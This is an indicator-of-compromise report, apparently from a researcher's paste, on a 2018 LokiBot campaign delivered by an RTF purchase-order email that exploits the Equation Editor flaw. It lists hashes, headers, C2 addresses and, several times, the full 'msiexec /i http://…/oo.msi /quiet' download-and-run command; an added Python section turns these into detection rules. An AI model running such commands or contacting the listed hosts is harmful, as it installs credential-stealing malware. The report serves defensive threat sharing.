VRad

#lokibot_151118

Nov 15th, 2018
#IOC #OptiData #VR #LokiBot #11882 #MSI

https://pastebin.com/cqZg7kwr

previous_contacts:
--------------
16/10/18 - https://pastebin.com/LPqjHUkQ
08/10/18 - https://pastebin.com/cZxQGbyq
01/10/18 - https://pastebin.com/AVWK3XsB

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_lokibot_161018/

attack_vector
--------------
email attach doc(RTF) > 11882 > EQNEDT32.EXE GET > msiexec.exe /i 34.244.180.39/oo.msi

email_headers
--------------
Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
Received: from [::1] (port=48392 helo=server.sauditunnels.com)
by server.sauditunnels.com with esmtpa (Exim 4.91)
(envelope-from <meenakshi@uhlpharma.co.in>)
Date: Thu, 15 Nov 2018 06:34:16 +0300
From: PURCHASE <mshahbour@elayouty.com>
To: undisclosed-recipients:;
Subject: PURCHASE ORDER 25437
X-Sender: meenakshi@uhlpharma.co.in
User-Agent: Roundcube Webmail/1.3.6

files
--------------
SHA-256 1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513
File name DOC_ORDER25437.doc (!) RTF
File size 265.34 KB

SHA-256 917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051
File name oo.msi
File size 1.25 MB

Denis O'Brien @Malwageddon:
"If metadata doesn't lie, the RTF file was created back in Sep."

activity
**************

cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180{.} 39/oo.msi /quiet

PL_GET: 34.244.180.39/oo.msi

C2: 188.225.27.43
h11p://sahakyanshn{.} com/baba1010/five/fre.php

netwrk
--------------
GET /oo.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: 34.244.180.39

188.225.27.43 sahakyanshn{.} com POST /baba1010/five/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)

comp
--------------
msiexec.exe 440 TCP 34.244.180.39 80 SYN_SENT
MSIF29F.tmp 3348 TCP 188.225.27.43 80 ESTABLISHED
[System] 0 TCP 188.225.27.43 80 TIME_WAIT

proc
--------------
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet
C:\Windows\SysWOW64\msiexec.exe /i http://34.244.180.39/oo.msi /quiet
C:\Windows\system32\msiexec.exe /V
"C:\Windows\Installer\MSIF29F.tmp"
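Added detection example (not part of the original paste, nor the author's tooling): the script below turns the attack_vector / proc / netwrk sections above into host and proxy detection rules and runs them over constructed Sysmon-style process events and HTTP request records. The command lines and the two User-Agent strings are taken from the IOC list; the parent/child pairing, the field names, and the benign control events are assumptions of this example.

```python
"""Detection rules for the delivery chain in the IOC list:
RTF -> CVE-2017-11882 (EQNEDT32.EXE) -> cmd.exe -> msiexec.exe /i http://<ip>/oo.msi
-> dropped MSIF29F.tmp -> POST to C2 with User-Agent 'Mozilla/4.08 (Charon; Inferno)'."""
import ipaddress
import ntpath
import re

# Constructed Sysmon-style process-creation events. Command lines are from the IOC
# "proc" section; the parent_image values are assumed for this example.
PROC_EVENTS = [
    {"parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "command_line": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"parent_image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": r"C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet"},
    {"parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "command_line": r"C:\Windows\SysWOW64\msiexec.exe /i http://34.244.180.39/oo.msi /quiet"},
    # Constructed benign control: same binary, local package path, must not alert.
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"C:\Windows\System32\msiexec.exe /i C:\Users\operator\Downloads\tool.msi"},
]

# Constructed proxy/HTTP records modelled on the IOC "netwrk" section, plus a benign control.
HTTP_EVENTS = [
    {"process": "msiexec.exe", "method": "GET", "host": "34.244.180.39",
     "path": "/oo.msi", "user_agent": "Windows Installer"},
    {"process": "MSIF29F.tmp", "method": "POST", "host": "sahakyanshn.com",
     "path": "/baba1010/five/fre.php", "user_agent": "Mozilla/4.08 (Charon; Inferno)"},
    {"process": "browser.exe", "method": "GET", "host": "www.example.com",
     "path": "/", "user_agent": "Mozilla/5.0"},
]

# "/i <url>" = msiexec installing a package straight from a remote web server.
REMOTE_MSI = re.compile(r'/i\s+"?https?://', re.IGNORECASE)
LOKI_UA = "Mozilla/4.08 (Charon; Inferno)"  # C2 User-Agent seen in the netwrk section


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_process(ev):
    """Return the names of every process rule that fires for one event."""
    hits = []
    cmd = ev["command_line"]
    # Equation Editor has no legitimate reason to spawn child processes.
    if basename(ev["parent_image"]) == "eqnedt32.exe":
        hits.append("equation_editor_spawned_child")
    # Windows Installer pulling the package over HTTP(S) rather than from disk.
    if basename(ev["image"]) == "msiexec.exe" and REMOTE_MSI.search(cmd):
        hits.append("msiexec_remote_package")
    # The exact CVE-2017-11882 payload shape from this sample: cmd chaining into msiexec + URL.
    if basename(ev["image"]) == "cmd.exe" and "msiexec" in cmd.lower() and REMOTE_MSI.search(cmd):
        hits.append("cmd_launches_remote_msiexec")
    return hits


def check_http(ev):
    """Return the names of every network rule that fires for one HTTP record."""
    hits = []
    if ev["method"] == "POST" and ev["user_agent"] == LOKI_UA:
        hits.append("lokibot_c2_user_agent")
    if (ev["user_agent"] == "Windows Installer" and is_ip_literal(ev["host"])
            and ev["path"].lower().endswith(".msi")):
        hits.append("windows_installer_fetch_from_ip")
    return hits


def run_detections(proc_events=PROC_EVENTS, http_events=HTTP_EVENTS):
    """Evaluate all rules; returns a list of (rule_name, short_description) tuples."""
    alerts = []
    for ev in proc_events:
        for rule in check_process(ev):
            alerts.append((rule, f"{basename(ev['parent_image'])} -> {basename(ev['image'])}"))
    for ev in http_events:
        for rule in check_http(ev):
            alerts.append((rule, f"{ev['process']} {ev['method']} {ev['host']}{ev['path']}"))
    return alerts


if __name__ == "__main__":
    for rule, detail in run_detections():
        print(f"[{rule}] {detail}")
```

The process rules are deliberately independent so that each stage of the chain alerts on its own: a patched Equation Editor removes the first hit, but a remote `msiexec /i http://...` launch is still worth an alert on any host, and the C2 User-Agent rule catches the implant after the dropper stage regardless of how it arrived.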
  78.  
persist
--------------
n/a

drop
--------------
C:\Windows\Installer\MSIF29F.tmp
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb

# # #
doc (RTF) https://www.virustotal.com/#/file/1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513/details
https://iris-h.services/#/pages/report/3dd0fe53b7f1ade6765df8da45b8b7c2ae6ed41b
msi https://www.virustotal.com/#/file/917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051/details
https://analyze.intezer.com/#/analyses/3d6796ac-e098-4b61-aad7-3cc552dd2304